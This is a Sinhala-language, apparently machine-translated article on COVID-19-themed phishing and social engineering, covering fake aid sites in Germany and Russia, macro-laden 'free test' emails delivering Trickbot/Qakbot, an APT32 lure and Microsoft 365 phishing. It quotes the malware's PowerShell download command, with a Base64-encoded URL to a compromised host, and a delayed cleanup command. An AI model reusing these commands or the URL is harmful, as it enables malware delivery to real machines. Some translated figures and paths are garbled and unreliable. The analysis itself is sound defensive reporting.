කොරෝනා වයිරස් සයිබර් ප්‍රහාර: සමස්ත කාරණය සමාජ ඉංජිනේරු විද්‍යාවේ ය

වසංගතයට සම්බන්ධ සෑම දෙයක් ගැනම දැඩි උනන්දුවක් දක්වන පරිශීලකයින් සඳහා වැඩි වැඩියෙන් තර්ජන නිර්මාණය කරමින් ප්‍රහාරකයින් COVID-19 මාතෘකාව දිගටම ප්‍රයෝජනයට ගනී. තුල අන්තිම පෝස්ට් එක කිරීටක වෛරසයෙන් පසු කුමන ආකාරයේ අනිෂ්ට මෘදුකාංග දර්ශනය වී ඇත්ද යන්න ගැන අපි දැනටමත් කතා කර ඇති අතර, අද අපි රුසියාව ඇතුළු විවිධ රටවල පරිශීලකයින් දැනටමත් මුහුණ දී ඇති සමාජ ඉංජිනේරු ශිල්පීය ක්‍රම ගැන කතා කරමු. සාමාන්ය ප්රවණතා සහ උදාහරණ කප්පාදුව යටතේ ඇත.

මතක තබා ගන්න පසුගිය කාලය කිරීටක වයිරසය සහ වසංගතයේ ගමන් මග ගැන පමණක් නොව, මූල්‍ය ආධාර ක්‍රියාමාර්ග ගැන ද කියවීමට මිනිසුන් කැමැත්තෙන් සිටින බව අපි කතා කළෙමු. මෙන්න හොඳ උදාහරණයක්. ජර්මානු ප්‍රාන්තයේ North Rhine-Westphalia හෝ NRW හි සිත්ගන්නා තතුබෑම් ප්‍රහාරයක් සොයා ගන්නා ලදී. ප්‍රහාරකයන් විසින් ආර්ථික අමාත්‍යාංශයේ වෙබ් අඩවියේ පිටපත් නිර්මාණය කර ඇත (NRW ආර්ථික කටයුතු අමාත්‍යාංශය), ඕනෑම කෙනෙකුට මූල්‍ය ආධාර සඳහා ඉල්ලුම් කළ හැකිය. එවැනි වැඩසටහනක් ඇත්ත වශයෙන්ම පවතින අතර, එය වංචාකරුවන්ට ප්රයෝජනවත් විය. ඔවුන්ගේ වින්දිතයින්ගේ පුද්ගලික දත්ත ලැබීමෙන් පසු, ඔවුන් සැබෑ අමාත්‍යාංශයේ වෙබ් අඩවියේ අයදුම්පතක් ඉදිරිපත් කළ නමුත් වෙනත් බැංකු තොරතුරු සඳහන් කළහ. නිල දත්ත වලට අනුව, යෝජනා ක්රමය සොයා ගන්නා තෙක් එවැනි ව්යාජ ඉල්ලීම් 4 ක් ඉදිරිපත් කර ඇත. එහි ප්රතිඵලයක් වශයෙන්, බලපෑමට ලක්වූ පුරවැසියන් සඳහා අදහස් කරන ලද ඩොලර් මිලියන 109 වංචාකරුවන් අතට පත් විය.

ඔබ COVID-19 සඳහා නොමිලේ පරීක්ෂණයකට කැමතිද?

කොරොන වයිරස් තේමාවෙන් යුත් තතුබෑම් පිළිබඳ තවත් වැදගත් උදාහරණයක් විය සොයා ගන්නා ලදී ඊමේල් වල. කොරොන වයිරස් ආසාදනය සඳහා නොමිලේ පරීක්‍ෂණයක් කිරීමට ඉල්ලීමක් සමඟ පණිවිඩ පරිශීලකයින්ගේ අවධානයට ලක් විය. මේවායේ ඇමිණීම තුළ ලිපි Trickbot/Qakbot/Qbot අවස්ථා තිබුණා. ඔවුන්ගේ සෞඛ්‍යය පරීක්ෂා කිරීමට කැමති අය “ඇමිණූ පෝරමය පුරවන්න” පටන් ගත් විට, අනිෂ්ට ස්ක්‍රිප්ට් පරිගණකයට බාගත විය. තවද සෑන්ඩ්බොක්සිං පරීක්ෂණ වළක්වා ගැනීම සඳහා, ස්ක්‍රිප්ටය ප්‍රධාන වෛරසය බාගත කිරීම ආරම්භ කළේ යම්කිසි කාලයකට පසුව, ද්වේෂසහගත ක්‍රියාවක් සිදු නොවන බව ආරක්ෂණ පද්ධති ඒත්තු ගැන්වූ විට පමණි.

මැක්‍රෝස් සක්‍රීය කිරීමට බොහෝ පරිශීලකයින්ට ඒත්තු ගැන්වීම ද පහසු විය. මෙය සිදු කිරීම සඳහා, සම්මත උපක්‍රමයක් භාවිතා කරන ලදී: ප්‍රශ්නාවලිය පිරවීම සඳහා, ඔබ ප්‍රථමයෙන් මැක්‍රෝස් සක්‍රීය කළ යුතුය, එයින් අදහස් වන්නේ ඔබ VBA ස්ක්‍රිප්ට් එකක් ධාවනය කළ යුතු බවයි.

ඔබට පෙනෙන පරිදි, VBA ස්ක්‍රිප්ට් විශේෂයෙන් ප්‍රති-වයිරස වලින් ආවරණය කර ඇත.

පෙරනිමි “ඔව්” පිළිතුර පිළිගැනීමට පෙර යෙදුම /T <තත්පර> රැඳී සිටින ස්ථානයේ රැඳී සිටීමේ විශේෂාංගයක් වින්ඩෝස් සතුව ඇත. අපගේ නඩුවේදී, තාවකාලික ගොනු මකා දැමීමට පෙර ස්ක්‍රිප්ටය තත්පර 65ක් රැඳී සිටියේය:

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt

ඒවගේම බලාගෙන ඉන්නකොට අනිෂ්ට මෘදුකාංග බාගත්තා. මේ සඳහා විශේෂ PowerShell පිටපතක් දියත් කරන ලදී:

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt

Base64 අගය විකේතනය කිරීමෙන් පසුව, PowerShell ස්ක්‍රිප්ට් ජර්මනියේ සිට කලින් හැක් කරන ලද වෙබ් සේවාදායකයේ ඇති පසු දොර බාගත කරයි:

http://automatischer-staubsauger.com/feature/777777.png

සහ එය නම යටතේ සුරකියි:

C:UsersPublictmpdirfile1.exe

ෆෝල්ඩරය ‘C:UsersPublictmpdir’ විධානය අඩංගු 'tmps1.bat' ගොනුව ධාවනය කරන විට මකා දමනු ලැබේ cmd /c mkdir ""C:UsersPublictmpdir"".

රාජ්‍ය ආයතන ඉලක්ක කරගත් ප්‍රහාරයක්

මීට අමතරව, FireEye විශ්ලේෂකයින් විසින් මෑතකදී Wuhan හි රජයේ ව්‍යුහයන් මෙන්ම චීන හදිසි කළමනාකරණ අමාත්‍යාංශය ඉලක්ක කරගත් APT32 ප්‍රහාරයක් වාර්තා කරන ලදී. බෙදා හරින ලද RTF එකක නිව් යෝර්ක් ටයිම්ස් ලිපියකට සබැඳියක් අඩංගු විය කොරෝනා වයිරස් සජීවී යාවත්කාලීන: චීනය Hubei සිට සංචාරකයින් ලුහුබඳිමින් සිටී. කෙසේ වෙතත්, එය කියවීමෙන් පසු, අනිෂ්ට මෘදුකාංග බාගත කර ඇත (FireEye විශ්ලේෂකයින් එම අවස්ථාව METALJACK ලෙස හඳුනාගෙන ඇත).

වයිරස්ටෝටල්ට අනුව, හඳුනාගැනීමේදී, කිසිදු ප්‍රති-වයිරසයක් මෙම අවස්ථාව අනාවරණය කර නොගැනීම සිත්ගන්නා කරුණකි.

නිල වෙබ් අඩවි අක්‍රිය වූ විට

තතුබෑම් ප්‍රහාරයක වඩාත්ම කැපී පෙනෙන උදාහරණය පසුගිය දිනක රුසියාවේ සිදු විය. මෙයට හේතුව වයස අවුරුදු 3 සිට 16 දක්වා ළමුන් සඳහා දිගුකාලීන අපේක්ෂිත ප්රතිලාභයක් පත් කිරීමයි. අයදුම්පත් භාරගැනීමේ ආරම්භය 12 මැයි 2020 වන දින ප්‍රකාශයට පත් කළ විට, මිලියන ගණනක් දිගු කලක් බලා සිටි උපකාර සඳහා රාජ්‍ය සේවා වෙබ් අඩවිය වෙත දිව ගිය අතර වෘත්තීය DDoS ප්‍රහාරයකට වඩා නරක නොවන ද්වාරය පහතට ගෙන එන ලදී. “රජයේ සේවාවන්ට අයදුම්පත් ගලායාම සමඟ සාර්ථකව කටයුතු කළ නොහැකි” බව ජනාධිපතිවරයා පැවසීමත් සමඟ අයැදුම්පත් භාර ගැනීම සඳහා විකල්ප වෙබ් අඩවියක් දියත් කිරීම ගැන ජනතාව අන්තර්ජාලය හරහා කතා කිරීමට පටන් ගත්හ.

ගැටළුව වන්නේ අඩවි කිහිපයක් එකවර වැඩ කිරීමට පටන් ගත් අතර, එකක්, posobie16.gosuslugi.ru හි ඇති සැබෑ එක, ඇත්ත වශයෙන්ම යෙදුම් පිළිගනී, තවත් දුසිම් ගනනක් රැවටිලිකාර පරිශීලකයින්ගේ පුද්ගලික දත්ත රැස් කරයි.

SearchInform හි සගයන් .ru කලාපය තුළ නව වංචනික වසම් 30ක් පමණ සොයා ගත්හ. Infosecurity සහ Softline සමාගම අප්‍රේල් මස මුල සිට සමාන ව්‍යාජ රාජ්‍ය සේවා වෙබ් අඩවි 70කට වඩා නිරීක්ෂණය කර ඇත. ඔවුන්ගේ නිර්මාපකයින් හුරුපුරුදු සංකේත හසුරුවන අතර gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie යනාදී වචනවල සංයෝජන ද භාවිතා කරයි.

හයිප් සහ සමාජ ඉංජිනේරු

මෙම සියලු උදාහරණ සනාථ කරන්නේ ප්‍රහාරකයන් කොරෝනා වයිරසයේ මාතෘකාව සාර්ථකව මුදල් ඉපැයීම පමණක් බවයි. සමාජ ආතතිය සහ වඩාත් නොපැහැදිලි ගැටළු වැඩි වන තරමට, වංචාකරුවන්ට වැදගත් දත්ත සොරකම් කිරීමට, මිනිසුන්ට ඔවුන්ගේ මුදල් තනිවම අත්හැරීමට හෝ තවත් පරිගණක හැක් කිරීමට ඇති අවස්ථා වැඩි වේ.

වසංගතය නිසා සූදානම් නැති පුද්ගලයින්ට නිවසේ සිට සමූහ වශයෙන් වැඩ කිරීමට බල කර ඇති හෙයින්, පුද්ගලික පමණක් නොව ආයතනික දත්ත ද අවදානමට ලක්ව ඇත. උදාහරණයක් ලෙස, මෑතකදී Microsoft 365 (කලින් Office 365) භාවිතා කරන්නන් ද තතුබෑම් ප්‍රහාරයකට ලක් විය. ලිපිවලට ඇමුණුම් ලෙස මිනිසුන්ට "මග හැරුණු" හඬ පණිවිඩ විශාල වශයෙන් ලැබිණි. කෙසේ වෙතත්, ගොනු ඇත්ත වශයෙන්ම ප්‍රහාරයට ගොදුරු වූවන් යවන HTML පිටුවකි ව්‍යාජ Microsoft 365 පුරනය වීමේ පිටුව. එහි ප්‍රතිඵලයක් වශයෙන්, ගිණුමේ ඇති සියලුම දත්තවල ප්‍රවේශය අහිමි වීම සහ සම්මුතියක් ඇතිවීම.

මූලාශ්රය: www.habr.com